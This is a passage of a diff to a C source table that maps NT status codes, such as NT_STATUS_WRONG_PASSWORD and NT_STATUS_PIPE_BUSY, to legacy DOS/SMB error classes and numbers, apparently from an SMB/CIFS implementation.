+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_MIX}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_QUOTA_LOWER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_CORRUPT_ERROR}, {
+-	 /* mapping changed since shell does lookup on * expects FileNotFound */
+-	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_INVALID}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_NOT_FOUND}, {
+-	ERRDOS, ERRalreadyexists, NT_STATUS_OBJECT_NAME_COLLISION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_HANDLE_NOT_WAITABLE}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_PORT_DISCONNECTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_ALREADY_ATTACHED}, {
+-	ERRDOS, 161, NT_STATUS_OBJECT_PATH_INVALID}, {
+-	ERRDOS, ERRbadpath, NT_STATUS_OBJECT_PATH_NOT_FOUND}, {
+-	ERRDOS, 161, NT_STATUS_OBJECT_PATH_SYNTAX_BAD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DATA_OVERRUN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DATA_LATE_ERROR}, {
+-	ERRDOS, 23, NT_STATUS_DATA_ERROR}, {
+-	ERRDOS, 23, NT_STATUS_CRC_ERROR}, {
+-	ERRDOS, ERRnomem, NT_STATUS_SECTION_TOO_BIG}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_PORT_CONNECTION_REFUSED}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_INVALID_PORT_HANDLE}, {
+-	ERRDOS, ERRbadshare, NT_STATUS_SHARING_VIOLATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_EXCEEDED}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PAGE_PROTECTION}, {
+-	ERRDOS, 288, NT_STATUS_MUTANT_NOT_OWNED}, {
+-	ERRDOS, 298, NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED}, {
+-	ERRDOS, 87, NT_STATUS_PORT_ALREADY_SET}, {
+-	ERRDOS, 87, NT_STATUS_SECTION_NOT_IMAGE}, {
+-	ERRDOS, 156, NT_STATUS_SUSPEND_COUNT_EXCEEDED}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_THREAD_IS_TERMINATING}, {
+-	ERRDOS, 87, NT_STATUS_BAD_WORKING_SET_LIMIT}, {
+-	ERRDOS, 87, NT_STATUS_INCOMPATIBLE_FILE_MAP}, {
+-	ERRDOS, 87, NT_STATUS_SECTION_PROTECTION}, {
+-	ERRDOS, ERReasnotsupported, NT_STATUS_EAS_NOT_SUPPORTED}, {
+-	ERRDOS, 255, NT_STATUS_EA_TOO_LARGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NONEXISTENT_EA_ENTRY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_EAS_ON_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EA_CORRUPT_ERROR}, {
+-	ERRDOS, ERRlock, NT_STATUS_FILE_LOCK_CONFLICT}, {
+-	ERRDOS, ERRlock, NT_STATUS_LOCK_NOT_GRANTED}, {
+-	ERRDOS, ERRbadfile, NT_STATUS_DELETE_PENDING}, {
+-	ERRDOS, ERRunsup, NT_STATUS_CTL_FILE_NOT_SUPPORTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNKNOWN_REVISION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REVISION_MISMATCH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_OWNER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PRIMARY_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_IMPERSONATION_TOKEN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_DISABLE_MANDATORY}, {
+-	ERRDOS, 2215, NT_STATUS_NO_LOGON_SERVERS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_LOGON_SESSION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PRIVILEGE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_PRIVILEGE_NOT_HELD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACCOUNT_NAME}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_USER_EXISTS},
+-/*	{ This NT error code was 'sqashed'
+-	 from NT_STATUS_NO_SUCH_USER to NT_STATUS_LOGON_FAILURE
+-	 during the session setup } */
+-	{
+-	ERRDOS, ERRnoaccess, NT_STATUS_NO_SUCH_USER}, { /* could map to 2238 */
+-	ERRHRD, ERRgeneral, NT_STATUS_GROUP_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LAST_ADMIN},
+-/*	{ This NT error code was 'sqashed'
+-	 from NT_STATUS_WRONG_PASSWORD to NT_STATUS_LOGON_FAILURE
+-	 during the session setup } */
+-	{
+-	ERRSRV, ERRbadpw, NT_STATUS_WRONG_PASSWORD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_PASSWORD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PASSWORD_RESTRICTION}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ACCOUNT_RESTRICTION}, {
+-	ERRSRV, ERRbadLogonTime, NT_STATUS_INVALID_LOGON_HOURS}, {
+-	ERRSRV, ERRbadclient, NT_STATUS_INVALID_WORKSTATION}, {
+-	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_EXPIRED}, {
+-	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_DISABLED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NONE_MAPPED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_LUIDS_REQUESTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LUIDS_EXHAUSTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SUB_AUTHORITY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SECURITY_DESCR}, {
+-	ERRDOS, 127, NT_STATUS_PROCEDURE_NOT_FOUND}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_FORMAT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_TOKEN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_INHERITANCE_ACL}, {
+-	ERRDOS, 158, NT_STATUS_RANGE_NOT_LOCKED}, {
+-	ERRDOS, 112, NT_STATUS_DISK_FULL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SERVER_DISABLED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SERVER_NOT_DISABLED}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_GUIDS_REQUESTED}, {
+-	ERRDOS, 259, NT_STATUS_GUIDS_EXHAUSTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ID_AUTHORITY}, {
+-	ERRDOS, 259, NT_STATUS_AGENTS_EXHAUSTED}, {
+-	ERRDOS, 154, NT_STATUS_INVALID_VOLUME_LABEL}, {
+-	ERRDOS, 14, NT_STATUS_SECTION_NOT_EXTENDED}, {
+-	ERRDOS, 487, NT_STATUS_NOT_MAPPED_DATA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_DATA_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_TYPE_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_NAME_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ARRAY_BOUNDS_EXCEEDED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DENORMAL_OPERAND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DIVIDE_BY_ZERO}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INEXACT_RESULT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INVALID_OPERATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_STACK_CHECK}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_UNDERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTEGER_DIVIDE_BY_ZERO}, {
+-	ERRDOS, 534, NT_STATUS_INTEGER_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PRIVILEGED_INSTRUCTION}, {
+-	ERRDOS, ERRnomem, NT_STATUS_TOO_MANY_PAGING_FILES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FILE_INVALID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
+-/*	{ This NT error code was 'sqashed'
+-	 from NT_STATUS_INSUFFICIENT_RESOURCES to
+-	 NT_STATUS_INSUFF_SERVER_RESOURCES during the session setup } */
+-	{
+-	ERRDOS, ERRnoresource, NT_STATUS_INSUFFICIENT_RESOURCES}, {
+-	ERRDOS, ERRbadpath, NT_STATUS_DFS_EXIT_PATH_FOUND}, {
+-	ERRDOS, 23, NT_STATUS_DEVICE_DATA_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_CONNECTED}, {
+-	ERRDOS, 21, NT_STATUS_DEVICE_POWER_FAILURE}, {
+-	ERRDOS, 487, NT_STATUS_FREE_VM_NOT_AT_BASE}, {
+-	ERRDOS, 487, NT_STATUS_MEMORY_NOT_ALLOCATED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_WORKING_SET_QUOTA}, {
+-	ERRDOS, 19, NT_STATUS_MEDIA_WRITE_PROTECTED}, {
+-	ERRDOS, 21, NT_STATUS_DEVICE_NOT_READY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_GROUP_ATTRIBUTES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_IMPERSONATION_LEVEL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_OPEN_ANONYMOUS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_VALIDATION_CLASS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_TOKEN_TYPE}, {
+-	ERRDOS, 87, NT_STATUS_BAD_MASTER_BOOT_RECORD}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INSTRUCTION_MISALIGNMENT}, {
+-	ERRDOS, ERRpipebusy, NT_STATUS_INSTANCE_NOT_AVAILABLE}, {
+-	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_NOT_AVAILABLE}, {
+-	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_PIPE_STATE}, {
+-	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_BUSY}, {
+-	ERRDOS, ERRbadfunc, NT_STATUS_ILLEGAL_FUNCTION}, {
+-	ERRDOS, ERRnotconnected, NT_STATUS_PIPE_DISCONNECTED}, {
+-	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_CLOSING}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PIPE_CONNECTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PIPE_LISTENING}, {
+-	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_READ_MODE}, {
+-	ERRDOS, 121, NT_STATUS_IO_TIMEOUT}, {
+-	ERRDOS, 38, NT_STATUS_FILE_FORCED_CLOSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STARTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STOPPED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_COULD_NOT_INTERPRET}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_FILE_IS_A_DIRECTORY}, {
+-	ERRDOS, ERRunsup, NT_STATUS_NOT_SUPPORTED}, {
+-	ERRDOS, 51, NT_STATUS_REMOTE_NOT_LISTENING}, {
+-	ERRDOS, 52, NT_STATUS_DUPLICATE_NAME}, {
+-	ERRDOS, 53, NT_STATUS_BAD_NETWORK_PATH}, {
+-	ERRDOS, 54, NT_STATUS_NETWORK_BUSY}, {
+-	ERRDOS, 55, NT_STATUS_DEVICE_DOES_NOT_EXIST}, {
+-	ERRDOS, 56, NT_STATUS_TOO_MANY_COMMANDS}, {
+-	ERRDOS, 57, NT_STATUS_ADAPTER_HARDWARE_ERROR}, {
+-	ERRDOS, 58, NT_STATUS_INVALID_NETWORK_RESPONSE}, {
+-	ERRDOS, 59, NT_STATUS_UNEXPECTED_NETWORK_ERROR}, {
+-	ERRDOS, 60, NT_STATUS_BAD_REMOTE_ADAPTER}, {
+-	ERRDOS, 61, NT_STATUS_PRINT_QUEUE_FULL}, {
+-	ERRDOS, 62, NT_STATUS_NO_SPOOL_SPACE}, {
+-	ERRDOS, 63, NT_STATUS_PRINT_CANCELLED}, {
+-	ERRDOS, 64, NT_STATUS_NETWORK_NAME_DELETED}, {
+-	ERRDOS, 65, NT_STATUS_NETWORK_ACCESS_DENIED}, {
+-	ERRDOS, 66, NT_STATUS_BAD_DEVICE_TYPE}, {
+-	ERRDOS, ERRnosuchshare, NT_STATUS_BAD_NETWORK_NAME}, {
+-	ERRDOS, 68, NT_STATUS_TOO_MANY_NAMES}, {
+-	ERRDOS, 69, NT_STATUS_TOO_MANY_SESSIONS}, {
+-	ERRDOS, 70, NT_STATUS_SHARING_PAUSED}, {
+-	ERRDOS, 71, NT_STATUS_REQUEST_NOT_ACCEPTED}, {
+-	ERRDOS, 72, NT_STATUS_REDIRECTOR_PAUSED}, {
+-	ERRDOS, 88, NT_STATUS_NET_WRITE_FAULT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_AT_LIMIT}, {
+-	ERRDOS, ERRdiffdevice, NT_STATUS_NOT_SAME_DEVICE}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_FILE_RENAMED}, {
+-	ERRDOS, 240, NT_STATUS_VIRTUAL_CIRCUIT_CLOSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SECURITY_ON_OBJECT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_WAIT}, {
+-	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_EMPTY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_ACCESS_DOMAIN_INFO}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANT_TERMINATE_SELF}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SERVER_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_ROLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_DOMAIN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_LIMIT_EXCEEDED}, {
+-	ERRDOS, 300, NT_STATUS_OPLOCK_NOT_GRANTED}, {
+-	ERRDOS, 301, NT_STATUS_INVALID_OPLOCK_PROTOCOL}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_CORRUPTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_GENERIC_NOT_MAPPED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_DESCRIPTOR_FORMAT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_USER_BUFFER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_IO_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_CREATE_ERR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_MAP_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_EXTEND_ERR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_LOGON_PROCESS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_EXISTS}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_1}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_2}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_3}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_4}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_5}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_6}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_7}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_8}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_9}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_10}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_11}, {
+-	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_12}, {
+-	ERRDOS, ERRbadpath, NT_STATUS_REDIRECTOR_NOT_STARTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REDIRECTOR_STARTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PACKAGE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_FUNCTION_TABLE}, {
+-	ERRDOS, 203, 0xc0000100}, {
+-	ERRDOS, 145, NT_STATUS_DIRECTORY_NOT_EMPTY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FILE_CORRUPT_ERROR}, {
+-	ERRDOS, 267, NT_STATUS_NOT_A_DIRECTORY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_BAD_LOGON_SESSION_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_COLLISION}, {
+-	ERRDOS, 206, NT_STATUS_NAME_TOO_LONG}, {
+-	ERRDOS, 2401, NT_STATUS_FILES_OPEN}, {
+-	ERRDOS, 2404, NT_STATUS_CONNECTION_IN_USE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MESSAGE_NOT_FOUND}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_PROCESS_IS_TERMINATING}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LOGON_TYPE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_GUID_TRANSLATION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_IMPERSONATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IMAGE_ALREADY_LOADED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_PRESENT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_NOT_EXIST}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_ALREADY_OWNED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_LID_OWNER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_COMMAND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_LID}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_SELECTOR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_LDT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_SIZE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_OFFSET}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_DESCRIPTOR}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NE_FORMAT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RXACT_INVALID_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_RXACT_COMMIT_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_FILE_SIZE_ZERO}, {
+-	ERRDOS, ERRnofids, NT_STATUS_TOO_MANY_OPENED_FILES}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CANCELLED}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_CANNOT_DELETE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_COMPUTER_NAME}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_FILE_DELETED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_ACCOUNT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_GROUP}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_USER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBERS_PRIMARY_GROUP}, {
+-	ERRDOS, ERRbadfid, NT_STATUS_FILE_CLOSED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_THREADS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_THREAD_NOT_IN_PROCESS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOKEN_ALREADY_IN_USE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA_EXCEEDED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_COMMITMENT_LIMIT}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_LE_FORMAT}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NOT_MZ}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_PROTECT}, {
+-	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_WIN_16}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SERVER_CONFLICT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TIME_DIFFERENCE_AT_DC}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SYNCHRONIZATION_REQUIRED}, {
+-	ERRDOS, 126, NT_STATUS_DLL_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_OPEN_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IO_PRIVILEGE_FAILED}, {
+-	ERRDOS, 182, NT_STATUS_ORDINAL_NOT_FOUND}, {
+-	ERRDOS, 127, NT_STATUS_ENTRYPOINT_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CONTROL_C_EXIT}, {
+-	ERRDOS, 64, NT_STATUS_LOCAL_DISCONNECT}, {
+-	ERRDOS, 64, NT_STATUS_REMOTE_DISCONNECT}, {
+-	ERRDOS, 51, NT_STATUS_REMOTE_RESOURCES}, {
+-	ERRDOS, 59, NT_STATUS_LINK_FAILED}, {
+-	ERRDOS, 59, NT_STATUS_LINK_TIMEOUT}, {
+-	ERRDOS, 59, NT_STATUS_INVALID_CONNECTION}, {
+-	ERRDOS, 59, NT_STATUS_INVALID_ADDRESS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DLL_INIT_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MISSING_SYSTEMFILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNHANDLED_EXCEPTION}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_APP_INIT_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_CREATE_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_PAGEFILE}, {
+-	ERRDOS, 124, NT_STATUS_INVALID_LEVEL}, {
+-	ERRDOS, 86, NT_STATUS_WRONG_PASSWORD_CORE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_FLOAT_CONTEXT}, {
+-	ERRDOS, 109, NT_STATUS_PIPE_BROKEN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_CORRUPT}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_IO_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_EVENT_PAIR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_VOLUME}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SERIAL_NO_DEVICE_INITED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_ALIAS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_ALIAS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_ALIAS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ALIAS_EXISTS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LOGON_NOT_GRANTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SECRETS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SECRET_TOO_LONG}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FULLSCREEN_MODE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_CONTEXT_IDS}, {
+-	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_TYPE_NOT_GRANTED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NOT_REGISTRY_FILE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FT_MISSING_MEMBER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_SERVICE_ENTRY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_CHARACTER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNMAPPABLE_CHARACTER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNDEFINED_CHARACTER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_VOLUME}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_WRONG_CYLINDER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_UNKNOWN_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_BAD_REGISTERS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_RECALIBRATE_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_OPERATION_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DISK_RESET_FAILED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_SHARED_IRQ_BUSY}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_FT_ORPHANING}, {
+-	ERRHRD, ERRgeneral, 0xc000016e}, {
+-	ERRHRD, ERRgeneral, 0xc000016f}, {
+-	ERRHRD, ERRgeneral, 0xc0000170}, {
+-	ERRHRD, ERRgeneral, 0xc0000171}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_PARTITION_FAILURE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BLOCK_LENGTH}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_PARTITIONED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_LOCK_MEDIA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_UNLOAD_MEDIA}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_EOM_OVERFLOW}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_MEDIA}, {
+-	ERRHRD, ERRgeneral, 0xc0000179}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_MEMBER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_INVALID_MEMBER}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_KEY_DELETED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_NO_LOG_SPACE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SIDS}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_KEY_HAS_CHILDREN}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_CHILD_MUST_BE_VOLATILE}, {
+-	ERRDOS, 87, NT_STATUS_DEVICE_CONFIGURATION_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_INTERNAL_ERROR}, {
+-	ERRDOS, 22, NT_STATUS_INVALID_DEVICE_STATE}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_IO_DEVICE_ERROR}, {
+-	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_PROTOCOL_ERROR}, {
